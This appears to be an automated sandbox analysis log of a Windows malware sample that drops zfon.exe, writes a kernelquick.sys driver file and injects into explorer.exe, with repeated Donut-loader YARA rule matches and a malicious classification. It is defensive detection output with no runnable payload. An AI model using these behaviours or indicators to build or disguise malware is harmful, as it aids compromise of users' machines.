Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4FC210: CreateFileA,DeviceIoControl,8_2_000001E47C4FC210
Source: C:\Windows\hh.exeFile created: C:\ProgramData\kernelquick.sysJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeCode function: 0_2_0103D2E40_2_0103D2E4
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79CFBF0606_2_00007FF79CFBF060
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79CFB6FC06_2_00007FF79CFB6FC0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79CFBA9206_2_00007FF79CFBA920
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79CFB79C06_2_00007FF79CFB79C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79CFDE5C06_2_00007FF79CFDE5C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FF79CFD21706_2_00007FF79CFD2170
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B17CA06_2_00007FFBC1B17CA0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B381D86_2_00007FFBC1B381D8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B5816C6_2_00007FFBC1B5816C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B589506_2_00007FFBC1B58950
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B440E06_2_00007FFBC1B440E0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B36C746_2_00007FFBC1B36C74
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B573E06_2_00007FFBC1B573E0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B434106_2_00007FFBC1B43410
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B6A39E6_2_00007FFBC1B6A39E
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B62AE06_2_00007FFBC1B62AE0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B37AA86_2_00007FFBC1B37AA8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B632B86_2_00007FFBC1B632B8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B45E806_2_00007FFBC1B45E80
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B50E306_2_00007FFBC1B50E30
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B5363C6_2_00007FFBC1B5363C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B546086_2_00007FFBC1B54608
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B44E106_2_00007FFBC1B44E10
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B505706_2_00007FFBC1B50570
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B665806_2_00007FFBC1B66580
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B644A06_2_00007FFBC1B644A0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B35FC86_2_00007FFBC1B35FC8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B6A39E6_2_00007FFBC1B6A39E
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B567206_2_00007FFBC1B56720
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B516F06_2_00007FFBC1B516F0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B51F106_2_00007FFBC1B51F10
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B6169C6_2_00007FFBC1B6169C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79D0E8AD37_2_00007FF79D0E8AD3
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79D0E82C77_2_00007FF79D0E82C7
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79CFBF0607_2_00007FF79CFBF060
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79CFB6FC07_2_00007FF79CFB6FC0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79CFBA9207_2_00007FF79CFBA920
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79CFB79C07_2_00007FF79CFB79C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79D0216307_2_00007FF79D021630
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79D0E86A37_2_00007FF79D0E86A3
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79D0E95877_2_00007FF79D0E9587
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79CFDE5C07_2_00007FF79CFDE5C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79CFD21707_2_00007FF79CFD2170
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_00007FF79D0E73EB7_2_00007FF79D0E73EB
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDAE3347_2_0000026ADFDAE334
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDBB3087_2_0000026ADFDBB308
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD962607_2_0000026ADFD96260
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD5E1E07_2_0000026ADFD5E1E0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD601E07_2_0000026ADFD601E0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDAF0E07_2_0000026ADFDAF0E0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDC00A87_2_0000026ADFDC00A8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDBC08C7_2_0000026ADFDBC08C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD67FA47_2_0000026ADFD67FA4
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD6DF4C7_2_0000026ADFD6DF4C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD5CEC07_2_0000026ADFD5CEC0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDB8E707_2_0000026ADFDB8E70
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDB7E347_2_0000026ADFDB7E34
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD79D207_2_0000026ADFD79D20
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD87D147_2_0000026ADFD87D14
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD96B407_2_0000026ADFD96B40
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDC5B587_2_0000026ADFDC5B58
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD62A607_2_0000026ADFD62A60
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD7A9C47_2_0000026ADFD7A9C4
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDC58DC7_2_0000026ADFDC58DC
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFDB96AC7_2_0000026ADFDB96AC
Source: C:\Windows\hh.exeCode function: 8_2_000001E47AA1F9BC8_2_000001E47AA1F9BC
Source: C:\Windows\hh.exeCode function: 8_2_000001E47AA1F58C8_2_000001E47AA1F58C
Source: C:\Windows\hh.exeCode function: 8_2_000001E47AA1E2D48_2_000001E47AA1E2D4
Source: C:\Windows\hh.exeCode function: 8_2_000001E47AA204648_2_000001E47AA20464
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E7A608_2_000001E47C4E7A60
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E72D08_2_000001E47C4E72D0
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4EF3508_2_000001E47C4EF350
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E63708_2_000001E47C4E6370
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4EB4108_2_000001E47C4EB410
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E15008_2_000001E47C4E1500
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4FB5208_2_000001E47C4FB520
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4FADA08_2_000001E47C4FADA0
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C511F888_2_000001E47C511F88
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C5122048_2_000001E47C512204
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E94808_2_000001E47C4E9480
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C5075208_2_000001E47C507520
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4EADB08_2_000001E47C4EADB0
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E2E508_2_000001E47C4E2E50
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C50A6D88_2_000001E47C50A6D8
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C50C6FC8_2_000001E47C50C6FC
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E80C08_2_000001E47C4E80C0
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4F79108_2_000001E47C4F7910
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C50711C8_2_000001E47C50711C
Source: C:\Windows\explorer.exeCode function: 12_2_00B93A0712_2_00B93A07
Source: C:\Windows\explorer.exeCode function: 12_2_00B944BB12_2_00B944BB
Source: C:\Windows\explorer.exeCode function: 12_2_00B9231F12_2_00B9231F
Source: C:\Windows\explorer.exeCode function: 12_2_00B935D712_2_00B935D7
Source: C:\Windows\explorer.exeCode function: 12_2_0AAEFA2412_2_0AAEFA24
Source: C:\Windows\explorer.exeCode function: 12_2_0AAF61BC12_2_0AAF61BC
Source: C:\Windows\explorer.exeCode function: 12_2_0AAF01B012_2_0AAF01B0
Source: C:\Windows\explorer.exeCode function: 12_2_0AAE9E4412_2_0AAE9E44
Source: C:\Windows\explorer.exeCode function: 12_2_0AAE2F2012_2_0AAE2F20
Source: C:\Windows\explorer.exeCode function: 12_2_0AAE7DBC12_2_0AAE7DBC
Source: C:\Windows\explorer.exeCode function: 12_2_0AAF25F012_2_0AAF25F0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFBF06022_2_00007FF79CFBF060
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFB6FC022_2_00007FF79CFB6FC0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFBA92022_2_00007FF79CFBA920
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFB79C022_2_00007FF79CFB79C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFDE5C022_2_00007FF79CFDE5C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FF79CFD217022_2_00007FF79CFD2170
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28A39E22_2_00007FFBAD28A39E
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD264E1022_2_00007FFBAD264E10
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27460822_2_00007FFBAD274608
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27363C22_2_00007FFBAD27363C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD270E3022_2_00007FFBAD270E30
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD265E8022_2_00007FFBAD265E80
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2844A022_2_00007FFBAD2844A0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28658022_2_00007FFBAD286580
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27057022_2_00007FFBAD270570
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD255FC822_2_00007FFBAD255FC8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28169C22_2_00007FFBAD28169C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD271F1022_2_00007FFBAD271F10
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2716F022_2_00007FFBAD2716F0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27672022_2_00007FFBAD276720
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28A39E22_2_00007FFBAD28A39E
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2581D822_2_00007FFBAD2581D8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2640E022_2_00007FFBAD2640E0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27895022_2_00007FFBAD278950
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD27816C22_2_00007FFBAD27816C
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD28A39E22_2_00007FFBAD28A39E
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD26341022_2_00007FFBAD263410
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2773E022_2_00007FFBAD2773E0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD256C7422_2_00007FFBAD256C74
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD2832B822_2_00007FFBAD2832B8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD257AA822_2_00007FFBAD257AA8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD282AE022_2_00007FFBAD282AE0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBB50D7CA022_2_00007FFBB50D7CA0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: String function: 00007FF79D073D20 appears 51 times
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: String function: 00007FF79CFB2520 appears 84 times
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 396
Source: nrGkqbCyKP.exeStatic PE information: invalid certificate
Source: nrGkqbCyKP.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exe, 00000000.00000002.1993146321.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exe, 00000000.00000000.1468813441.00000000006E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHuya.ExternalTools.Processor.dll* vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs nrGkqbCyKP.exe
Source: nrGkqbCyKP.exeBinary or memory string: OriginalFilenameHuya.ExternalTools.Processor.dll* vs nrGkqbCyKP.exe
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.nrGkqbCyKP.exe.3df72e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.nrGkqbCyKP.exe.3dda070.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.nrGkqbCyKP.exe.3ca7600.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 7.2.zfon.exe.7ff79cfb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000006.00000002.1995777585.0000029D64782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000008.00000002.2733221999.000001E47A9F0000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000002.2045463001.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2059338632.0000026ADFDF7000.00000008.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000003.2010588639.0000026ADE1D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000000.2018147867.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal100.evad.winEXE@13/25@6/5
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B412C0 GetDiskFreeSpaceExW,6_2_00007FFBC1B412C0
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD55890 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,7_2_0000026ADFD55890
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E7A60 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CoCreateInstance,RegQueryValueExW,8_2_000001E47C4E7A60
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57Jump to behavior
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7064
Source: C:\Windows\hh.exeMutant created: \Sessions\1\BaseNamedObjects\????
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeMutant created: NULL
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeMutant created: \Sessions\1\BaseNamedObjects\Blizzard_Scene 0.1_sb
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\edd88b19-8e13-490a-b8ca-43a0d8032f59Jump to behavior
Source: unknownProcess created: C:\Windows\explorer.exe
Source: nrGkqbCyKP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nrGkqbCyKP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: nrGkqbCyKP.exeReversingLabs: Detection: 23%
Source: zfon.exeString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: zfon.exeString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: zfon.exeString found in binary or memory: https://www.battle.net/shop/simplecheckout/loading
Source: unknownProcess created: C:\Users\user\Desktop\nrGkqbCyKP.exe "C:\Users\user\Desktop\nrGkqbCyKP.exe"
